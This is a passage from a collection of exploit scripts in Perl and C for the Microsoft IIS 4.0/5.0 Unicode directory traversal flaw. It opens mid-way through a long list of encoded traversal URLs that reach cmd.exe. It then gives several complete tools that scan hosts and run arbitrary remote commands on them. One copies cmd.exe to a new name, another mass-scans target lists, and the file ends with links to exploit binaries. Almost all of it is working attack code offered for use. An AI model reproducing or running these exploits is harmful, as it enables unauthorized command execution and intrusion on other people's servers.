"/_mem_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[365] = "/_mem_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[366] = "/_mem_bin/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[367] = "/_mem_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[368] = "/_mem_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+"; $U[369] = "/_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[379] = "/_mem_bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[371] = "/_mem_bin/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[372] = "/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[373] = "/_mem_bin/..%255c../winnt/system32/cmd.exe?/c+"; $U[374] = "/_mem_bin/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[375] = "/_mem_bin/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[376] = "/_mem_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $U[377] = "/_mem_bin/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $U[378] = "/_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"; $U[379] = "/_mem_bin/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[380] = "/_mem_bin/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[381] = "/_mem_bin/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[382] = "/_mem_bin/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[383] = "/_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[384] = "/_mem_bin/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[385] = "/_mem_bin/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[386] = "/_mem_bin/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[387] = "/_mem_bin/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[388] = "/_mem_bin/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[389] = "/_mem_bin/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[390] = "/_mem_bin/..%c1%9c/winnt/system32/cmd.exe?/c+"; $U[391] = "/_mem_bin/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+"; $U[392] = "/_mem_bin/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[393] = "/_mem_bin/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[394] = "/_mem_bin/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[395] = "/_mem_bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[396] = "/_mem_bin/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[397] = "/_mem_bin/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[398] = "/_mem_bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[399] = "/_mem_bin/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[400] = "/_vti_bin/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[401] = "/_vti_bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[402] = "/_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[403] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+"; $U[404] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[405] = "/_vti_bin/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[406] = "/_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[407] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[408] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[409] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[410] = "/_vti_bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[411] = "/_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[412] = "/_vti_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[413] = "/_vti_bin/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[414] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[415] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+"; $U[416] = "/_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[417] = "/_vti_bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[418] = "/_vti_bin/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[419] = "/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[420] = "/_vti_bin/..%255c../winnt/system32/cmd.exe?/c+"; $U[421] = "/_vti_bin/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[422] = "/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[423] = "/_vti_bin/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[424] = "/_vti_bin/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[425] = "/_vti_bin/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[426] = "/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[427] = "/_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[428] = "/_vti_bin/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[429] = "/iisadmpwd/cmd.exe?/c+"; $U[430] = "/iisadmpwd/cmd1.exe?/c+"; $U[431] = "/iisadmpwd/root.exe?/c+"; $U[432] = "/iisadmpwd/sensepost.exe?/c+"; &intro; &scan; &choose; &command; &exit; sub intro { &help; &host; &server; sleep 3; }; sub host { print "\nHost or IP : "; $host=<STDIN>; chomp $host; if ($host eq ""){$host="127.0.0.1"}; print "\nPort (enter to accept 80): "; $port=<STDIN>; chomp $port; if ($port =~/\D/ ){$port="80"}; if ($port eq "" ) {$port = "80"}; }; sub server { my $X; print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; print "\nGet IIS string ..."; $probe = "string"; my $output; my $webserver = "something"; &connect; for ($X=0; $X<=10; $X++){ $output = $results[$X]; if (defined $output){ if ($output =~/IIS/){ $webserver = "iis" }; }; }; if ($webserver ne "iis"){ print "\a\a\n\nWARNING : UNABLE TO GET IIS STRING."; print "\nThis Server may not be running Micro\$oft IIS WebServer"; print "\n\n\nContinue anyway? ... [Y/N]"; my $choice = <STDIN>; chomp $choice; if ($choice =~/N/i) {&exit}; }else{ print "\n\nOK"; }; }; sub scan { my $status = "not_vulnerable"; print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; print "\nScanning $host on port $port ..."; my $loop; my $output; my $flag; $command="dir"; for ($loop=1; $loop < @U; $loop++) { $flag = "0"; $url = $U[$loop]; $probe = "scan"; &connect; foreach $output (@results){ if ($output =~ /Directory/) { $flag = "1"; $status = "vulnerable"; }; }; if ($flag eq "0") { print "\nNo URL $loop..."; }else{ print "\a\a\a\n$host VULNERABLE TO URL $loop !!!"; }; }; if ($status eq "not_vulnerable"){ print "\n\n SORRY $host is NOT Vulnerable to this Exploit."; &exit; }; }; sub choose { print "\nSelect a URL (type 0 to input)"; my $choice=<STDIN>; chomp $choice; if ($choice > @U){ &choose }; if ($choice =~/\D/g ){ &choose }; if ($choice == 0){ &other }; $url = $U[$choice]; print "\nURL: HTTP://$host$url"; }; sub other { print "\nURL [minus command] eg: HTTP://$host\/scripts\/cmd.exe?\/+"; print "\nHTTP://$host"; my $other = <STDIN>; chomp $other; $U[0] = $other; }; sub command { while ($command !~/quit/i) { print "\nHELP QUIT URL SCAN Or Command eg dir C: "; print "\nCommand :"; $command = <STDIN>; chomp $command; if ($command =~/quit/i) { &exit }; if ($command =~/url/i) { &choose }; if ($command =~/scan/i) { &scan }; if ($command =~/help/i) { &help }; $command =~ s/\s/+/g; print "HTTP://$host$url$command"; $probe = "command"; if ($command !~/quit|url|scan|help/) {&connect}; }; &exit; }; sub connect { my $connection = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port", ) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n"; $connection -> autoflush(1); if ($probe =~/command|scan/){ print $connection "GET $url$command$shiz HTTP/1.1\r\nHost: $host\r\n\r\n"; }elsif ($probe =~/string/) { print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n"; }; while ( <$connection> ) { @results = <$connection>; }; close $connection; if ($probe eq "command"){ &output }; if ($probe eq "string"){ &output }; }; sub output{ print "\nOUTPUT FROM $host. \n\n"; my $display; if ($probe eq "string") { my $X; for ($X=0; $X<=10; $X++) { $display = $results[$X]; if (defined $display){print "$display";}; sleep 1; }; }else{ foreach $display (@results){ print "$display"; sleep 1; }; }; }; sub exit{ print "\n\n\n ANDREA SPABAM 2002."; print "\nspabam.da.ru spabam\@go.to"; print "\n\n\n"; exit; }; sub help { print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; print "\n IIS-PLUS shell v 3.7 by SPABAM. 2002. spabam\@yahoo.com"; print "\n https://www.securityfocus.com/bid/1806/exploit/ "; print "\n A IIS HTTP exploit for Micro\$oft WebServers using 450 URL."; print "\n note.. web directory is normally c:\\Inetpub\\wwwroot"; print "\n"; print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)"; print "\n port: 80 (normally) or other (like https) (RETURN for 80)"; print "\n Command: SCAN URL HELP QUIT"; print "\n\n\n";

/* iisex iis exploit (<- nost's idea) v2 * -------------------------------------- * Okay.. the first piece of code was not really finished. * So, i apologize to everybody.. * * by incubus <[email protected]> * * grtz to: Bio, nos, zoa, reg and vor... (who else would stay up * at night to exploit this?) to securax (#securax@efnet) - also * to kim, glyc, s0ph, tessa, lamagra and steven. */ #include <netdb.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> int main(int argc, char **argv){ char buffy[666]; /* well, what else? I dunno how long your commands are.. */ char buf[500]; char rcvbuf[8192]; int i, sock, result; struct sockaddr_in name; struct hostent *hostinfo; if (argc < 2){ printf ("try %s www.server.com\n", argv[0]); printf ("will let you play with cmd.exe of an IIS4/5 server.\n"); printf ("by incubus <[email protected]>\n\n"); exit(0); } printf ("\niisex - iis 4 and 5 exploit\n---------------------------\n"); printf ("act like a cmd.exe kiddie, type quit to quit.\n"); for (;;) { printf ("\n[enter cmd> "); gets(buf); if (strstr(buf, "quit")) exit(0); i=0; while (buf[i] != '\n'){ if(buf[i] == 32) buf[i] = 43; i++; } hostinfo=gethostbyname(argv[1]); if (!hostinfo){ herror("Oops"); exit(-1); } name.sin_family=AF_INET; name.sin_port=htons(80); name.sin_addr=*(struct in_addr *)hostinfo->h_addr; sock=socket(AF_INET, SOCK_STREAM, 0); result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in)); if (result != 0) { herror("Oops"); exit(-1); } if (sock < 0){ herror("Oops"); exit(-1); } strcpy(buffy,"GET /scripts/..\%c0%af../winnt/system32/cmd.exe?/c+"); strcat(buffy,buf); strcat(buffy, " HTTP/1.0\n\n"); send(sock, buffy, sizeof(buffy), 0); recv(sock, rcvbuf, sizeof(rcvbuf), 0); printf ("%s", rcvbuf); close(sock); } } // milw0rm.com [2000-11-18]

#!/usr/bin/perl # # IIS 4.0/5.0 Unicode Exploit # Checks for each script that has been posted on the BugTraq Lis # Shouts to bighawk(thats for help), datagram, Ghost Rider, The Duke, p4, kript0n and others # Since It Uses fork(), you gotta keep up with whats happening. Or Just Let it run and it will # log sites in the log_unicode.log. # So Simple # Use Socket use Socket; # incase no arguements or less arguements are given if(@ARGV == '0' || @ARGV < 2) { die "IIS 4.0/5.0 Unicode Exploit\n". "Programmed by SteeLe\n". "Usage: ./$0 <single host> <dir for exploit>\n"; } # Variables $blah = $ARGV[0]; $port = 80; $dir = $ARGV[1]; $timeout = 4; # see if file is there, if (-e "$blah") { open(T, "$blah") || die "can't open $blah\n"; @target = <T>; close(T); } else { @target[0] = $blah; } # what you think is blah # all scripts mentioned on bugtraq, we know rfp knows more. @scripts = ("..%c1%1c..", "..%c0%9v..", "..%c0%af..", "..%c0%qf..", "..%c1%8s..", "..%c1%9c..", "..%c1%pc.."); # blah, i know i'm not l33t # Open LOG Script open(LOG, ">>log_unicode.log") || die "couldn't open a file for writing\n"; # Socket Stuff foreach $script (@scripts) { $submit = "GET /scripts/$script/winnt/system32/cmd.exe?/c+dir+$dir HTTP/1.0 \n\r\n\r"; $ouch = "/scripts/$script/winnt/system32/cmd.exe?/c+dir+$dir"; foreach $site (@target) { unless(fork()) { chop($site) if $site =~ /\n$/; &connect($site); } # so i lied } } sub connect { # real socket stuff my ($ste) = @_; $iaddr = inet_aton($ste) || die "$ste might not be up, connecting to next site....\n"; $paddr = sockaddr_in($port, $iaddr); $proto = getprotobyname('tcp'); local $SIG{ALRM} = sub { print "TimeOut On $ste, going to next one....\n" && exit(0) }; alarm $timeout; socket(SCAN, PF_INET, SOCK_STREAM, $proto) || die("Error: couldn't make a socket to $ste"); connect(SCAN, $paddr) || die "Sorry couldn't connect to $ste, connecting to next site....\n"; send(SCAN, $submit, 0); $blackout = <SCAN>; ($http,$code,$blah) == split(/ /, $blackout); if ($code == "200") { print "$ste has $ouch on there, go exploit it\n"; print LOG "$ste has $ouch on there\n"; } else { print "$ste doesn't have it\n"; } close(SCAN); exit(0); } close(LOG); # since we're done exit; # milw0rm.com [2000-11-18]

#!/usr/bin/perl # # See http://www.securityfocus.com/vdb/bottom.html?section=exploit&vid=1806 # # Very simple PERL script to execute commands on IIS Unicode vulnerable servers # Use port number with SSLproxy for testing SSL sites # Usage: unicodexecute2 IP:port command # Only makes use of "Socket" library # # New in version2: # Copy the cmd.exe to something else, and then use it. # The script checks for this. # Thnx to [email protected] for discovering the cmd.exe copy part # # Roelof Temmingh 2000/10/26 # [email protected] http://www.sensepost.com use Socket; # --------------init if ($#ARGV<1) {die "Usage: unicodexecute IP:port command\n";} ($host,$port)=split(/:/,@ARGV[0]); $target = inet_aton($host); # --------------test if cmd has been copied: $failed=1; $command="dir"; @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /sensepost.exe/) {$failed=0;} } $failed2=1; if ($failed==1) { print "Sensepost.exe not found - Copying CMD...\n"; $command="copy c:\\winnt\\system32\\cmd.exe sensepost.exe"; $command=~s/ /\%20/g; @results2=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n"); foreach $line2 (@results2){ if (($line2 =~ /copied/ )) {$failed2=0;} } if ($failed2==1) {die "Copy of CMD failed - inspect manually:\n@results2\n\n"}; } # ------------ we can assume that the cmd.exe is copied from here.. $command=@ARGV[1]; print "Sensepost.exe found - Executing [$command] on $host:$port\n"; $command=~s/ /\%20/g; my @results=sendraw("GET /scripts/..%c0%af../inetpub/scripts/sensepost.exe?/c+$command HTTP/1.0\r\n\r\n"); print @results; # ------------- Sendraw - thanx RFP [email protected] sub sendraw { # this saves the whole transaction anyway my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); } } # Spidermark: sensepostdata # milw0rm.com [2000-11-18]

/****************************************************************************\ ** ** ** Microsoft IIS 4.0/5.0 Extended UNICODE Directory Traversal Exploit ** ** proof of theory exploit cuz it's wednesday and i'm on the couch ** ** ** ** brought to you by the letter B, the number 7, optyx, and t12 ** ** optyx - <[email protected] [email protected]> ** ** t12 - <[email protected]> ** ** ** ** greetz go out to aempirei, a gun toatin' gangstah' hustler' player ** ** motherfucker who isn't with us anymore, miah, who's GTA2 game was ** ** was most entertaining tonight, Cathy, who provided the trippy light ** ** to stare at, and to KT, for providing me with hours of decent ** ** conversation. ** ** ** \****************************************************************************/ #include <stdio.h> #include <netdb.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> #include <signal.h> #include <errno.h> #include <fcntl.h> void usage(void) { fprintf(stderr, "usage: ./iis-zank <-t target> <-c 'command' or -i>"); fprintf(stderr, " [-p port] [-t timeout]\n"); exit(-1); } int main(int argc, char **argv) { int i, j; int port=80; int timeout=3; int interactive=0; char temp[1]; char host[512]=""; char cmd[1024]=""; char request[8192]="GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+"; struct hostent *he; struct sockaddr_in s_addr; printf("iis-zank_bread_chafer_8000_super_alpha_hyper_pickle.c\n"); printf("by optyx and t12\n"); for(i=0;i<argc;i++) { if(argv[i][0] == '-') { for(j=1;j<strlen(argv[i]);j++) { switch(argv[i][j]) { case 't': strncpy(host, argv[i+1], sizeof(host)); break; case 'c': strncpy(cmd, argv[i+1], sizeof(cmd)); break; case 'h': usage(); break; case 'o': timeout=atoi(argv[i+1]); break; case 'p': port=atoi(argv[i+1]); break; case 'i': interactive=1; break; default: break; } } } } if(!strcmp(host, "")) { fprintf(stderr, "specify target host\n"); usage(); } if(!strcmp(cmd, "") && !interactive) { fprintf(stderr, "specify command to execute\n"); usage(); } printf("]- Target - %s:%d\n", host, port); if(!interactive) printf("]- Command - %s\n", cmd); printf("]- Timeout - %d seconds\n", timeout); if((he=gethostbyname(host)) == NULL) { fprintf(stderr, "invalid target\n"); usage(); } do { if(interactive) { cmd[0]=0; printf("\nC> "); if(fgets(cmd, sizeof(cmd), stdin) == NULL) fprintf(stderr, "gets() error\n"); cmd[strlen(cmd)-1]='\0'; if(!strcmp("exit", cmd)) exit(-1); } for(i=0;i<strlen(cmd);i++) { if(cmd[i]==' ') cmd[i]='+'; } strncpy(request, "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+", sizeof(request)); strncat(request, cmd, sizeof(request) - strlen(request)); strncat(request, "\n", sizeof(request) - strlen(request)); s_addr.sin_family = PF_INET; s_addr.sin_port = htons(port); memcpy((char *) &s_addr.sin_addr, (char *) he->h_addr, sizeof(s_addr.sin_addr)); if((i=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { fprintf(stderr, "cannot create socket\n"); exit(-1); } alarm(timeout); j = connect(i, (struct sockaddr *) &s_addr, sizeof(s_addr)); alarm(0); if(j==-1) { fprintf(stderr, "cannot connect to %s\n", host); exit(-1); close(i); } if(!interactive) printf("]- Sending request: %s\n", request); send(i, request, strlen(request), 0); if(!interactive) printf("]- Getting results\n"); while(recv(i,temp,1, 0)>0) { alarm(timeout); printf("%c", temp[0]); alarm(0); } } while(interactive); close(i); return 0; } https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/190-1.exe https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/190-2.obsd https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/190-3.linux // milw0rm.com [2000-11-18]